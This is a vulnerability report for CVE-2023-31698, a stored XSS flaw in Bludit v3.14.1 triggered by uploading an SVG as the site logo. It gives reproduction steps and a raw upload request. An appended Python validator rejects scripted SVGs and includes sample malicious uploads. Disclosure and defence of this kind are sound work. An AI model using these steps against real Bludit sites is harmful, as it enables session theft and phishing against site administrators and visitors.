CVE-2023-31698: Stored XSS via SVG file Vulnerability on Bludit v3.14.1 · Issue #1509 · bludit/bludit
Bludit v3.14.1 is vulnerable to Stored Cross-Site Scripting (XSS) via an SVG file uploaded as the site logo.
Description:
I found a Stored Cross-site Scripting (XSS) vulnerability in your Bludit - Flat-File CMS (v3.14.1), in the “General” settings, “Logo” field. When I send malicious code using an SVG file, the browser then gives me the result.
CMS Version:
v3.14.1
Affected URL:
http://127.0.0.1/bludit/admin/settings
Steps to Reproduce:
First, log in to your admin panel.
Then go to General settings and click the logo section.
Now open Notepad and save this code as xss.svg (with the .svg extension).
Now upload this xss.svg file in the logo section. Your request data will be:
POST /bludit/admin/ajax/logo-upload HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/112.0
Content-Type: multipart/form-data; boundary=---------------------------15560729415644048492005010998
Referer: http://127.0.0.1/bludit/admin/settings
Cookie: BLUDITREMEMBERUSERNAME=admin; BLUDITREMEMBERTOKEN=139167a80807781336bc7484552bc985; BLUDIT-KEY=tmap19d0m813e8rqfft8rsl74i
Content-Length: 651
-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="tokenCSRF"
626c201693546f472cdfc11bed0938aab8c6e480
-----------------------------15560729415644048492005010998
Content-Disposition: form-data; name="inputFile"; filename="xss.svg"
Content-Type: image/svg+xml
-----------------------------15560729415644048492005010998--
Now open the logo image link that you uploaded. You will see the XSS pop up.
Proof of Concept:
You can see the Proof of Concept: I’ve attached screenshots and a video to confirm the vulnerability.
poc.mp4
Impact:
Attackers can make use of this to conduct attacks like phishing, session stealing, etc.
Let me know if any further info is required.
Thanks & Regards
Rahad Chowdhury
Cyber Security Specialist
https://www.linkedin.com/in/rahadchowdhury/
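A server-side allow-list check for SVG uploads such as the logo field described in the report above, added here as an example and not code from Bludit or from the reporter. It assumes a UTF-8 SVG body, refuses DTDs before parsing, and rejects script elements, event-handler attributes, scheme-bearing hrefs and url()/expression() inside style attributes; the sample uploads at the bottom are constructed for illustration.

```python
import re
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
# No place in a static logo; <use> and animation elements are excluded too (deliberately conservative).
FORBIDDEN_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object", "use", "animate", "set"}
# Accept only fragment references ("#id") or scheme-less relative hrefs; rejects javascript:, data:, http:.
SAFE_HREF = re.compile(r"^#|^(?!\w+:)")


def svg_upload_is_safe(data: bytes) -> tuple[bool, str]:
    """Return (accepted, reason) for an uploaded SVG body. This is one layer only:
    uploads should also be served with Content-Disposition: attachment or from a
    separate origin that carries no admin session."""
    try:
        text = data.decode("utf-8")
    except UnicodeDecodeError:
        return False, "not valid UTF-8"
    # Refuse DTDs/entities before the parser sees them (entity expansion, XXE).
    if re.search(r"<!(DOCTYPE|ENTITY)", text, re.IGNORECASE):
        return False, "doctype or entity declaration"
    try:
        root = ET.fromstring(text)
    except ET.ParseError as exc:
        return False, f"not well-formed XML: {exc}"
    if root.tag != f"{{{SVG_NS}}}svg":
        return False, "root element is not <svg>"
    for el in root.iter():
        local = el.tag.rsplit("}", 1)[-1]  # strip namespace
        if local in FORBIDDEN_ELEMENTS:
            return False, f"forbidden element <{local}>"
        for name, value in el.attrib.items():
            attr = name.rsplit("}", 1)[-1]  # also covers xlink:href
            if attr.lower().startswith("on"):
                return False, f"event handler attribute {attr}"
            if attr == "href" and not SAFE_HREF.match(value.strip()):
                return False, f"external or scheme href: {value[:40]}"
            if attr == "style" and re.search(r"url\s*\(|expression\s*\(", value, re.I):
                return False, "style with url()/expression()"
    return True, "ok"


# Constructed sample uploads for illustration (not taken from the report).
BENIGN_LOGO = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 10 10">'
               b'<circle cx="5" cy="5" r="4" fill="#369"/></svg>')
SCRIPTED_LOGO = (b'<svg xmlns="http://www.w3.org/2000/svg">'
                 b'<script>console.log("ran")</script></svg>')
HANDLER_LOGO = (b'<svg xmlns="http://www.w3.org/2000/svg" onload="console.log(1)">'
                b'<rect width="1" height="1"/></svg>')
```

Run the check on the multipart part body before the file is written to disk; a rejected upload should be logged with the reason so attempts against the logo endpoint are visible in the admin audit trail.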